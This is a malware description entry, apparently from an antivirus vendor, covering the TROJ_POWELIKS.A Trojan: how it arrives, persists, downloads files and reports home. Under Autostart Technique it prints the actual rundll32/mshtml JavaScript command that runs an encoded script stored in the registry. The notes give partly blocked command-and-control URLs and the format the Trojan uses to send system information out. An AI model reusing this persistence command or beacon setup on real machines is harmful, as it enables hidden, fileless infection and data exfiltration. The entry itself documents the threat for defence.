TROJ_POWELIKS.A

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

It gathers certain information on the affected computer.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following copies of itself into the affected system:

• {malware path and filename}.exe:0

It adds the following processes:

• %System%\dllhost.exe

(Note: %System% is the Windows system folder, which is usually C:\Windows\System32.)

Autostart Technique

This Trojan adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
(Default) = "{encoded script detected as JS_POWELIKS.A}"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run\
[]
(Default) = "rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\software\microsoft\windows\currentversion\run\")+"\74/script>")"

Download Routine

This Trojan accesses the following websites to download files:

• It downloads a copy of Windows PowerShell depending on the user's Operating System (OS):
  • http://download.microsoft.com/download/3/C/8/{BLOCKED}-{BLOCKED}A-AAEA-5C48D1CD055C/Windows6.0-KB968930-x64.msu
  • http://download.microsoft.com/download/A/7/5/{BLOCKED}-{BLOCKED}-8FA4-AFB5C21BAC54/Windows6.0-KB968930-x86.msu
  • http://download.microsoft.com/download/B/D/9/{BLOCKED}-{BLOCKED}10-9334-6D0C58066AA7/WindowsServer2003-{BLOCKED}0-x64-ENG.exe
  • http://download.microsoft.com/download/9/8/6/{BLOCKED}-c2b7-45a4-bdc3-9db1b1c5f7e2/NetFx20SP1_x64.exe
  • http://download.microsoft.com/download/E/C/E/{BLOCKED}3-2003-455D-B681-{BLOCKED}610B44A4/WindowsXP-KB968930-x86-ENG.exe
  • http://download.microsoft.com/download/0/8/c/{BLOCKED}-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe
• It may download arbitrary files from the following URLs and saves it in %User Temp%:
  • http://{BLOCKED}8.{BLOCKED}9.159.34/q
  • http://{BLOCKED}8.{BLOCKED}9.159.35/q

It saves the files it downloads using the following names:

• %User Temp%\WindowsServer2003-KB968930-x64-ENG.exe
• %User Temp%\NetFx20SP1_x86.exe
• %User Temp%\NetFx20SP1_x64.exe
• %User Temp%\WindowsServer2003-KB968930-x64-ENG.exe
• %User Temp%\Windows6.0-KB968930-x86.msu
• %User Temp%\Windows6.0-KB968930-x64.msu

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, XP, and Server 2003, or C:\Users\{user name}\AppData\Local\Temp on Windows Vista and 7.)

It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

Information Theft

This Trojan gathers the following information on the affected computer:

• Operating system and architecture
• UUID
• Malware version
• Build date

NOTES:

It executes the encoded script in the registry detected as JS_POWELIKS.A

The decoded script contains the executable code of TROJ_POWELIKS.A.

It connects to the following URLs to report infection status and system information:

• http://{BLOCKED}8.{BLOCKED}9.159.34/q
• http://{BLOCKED}8.{BLOCKED}9.159.35/q

It sends information using the following format:

• type={status: start, install, exist, cmd or low}&version=1.0&aid={id}&builddate=%s&id={iuuid}&os={OS version}_{OS architecture}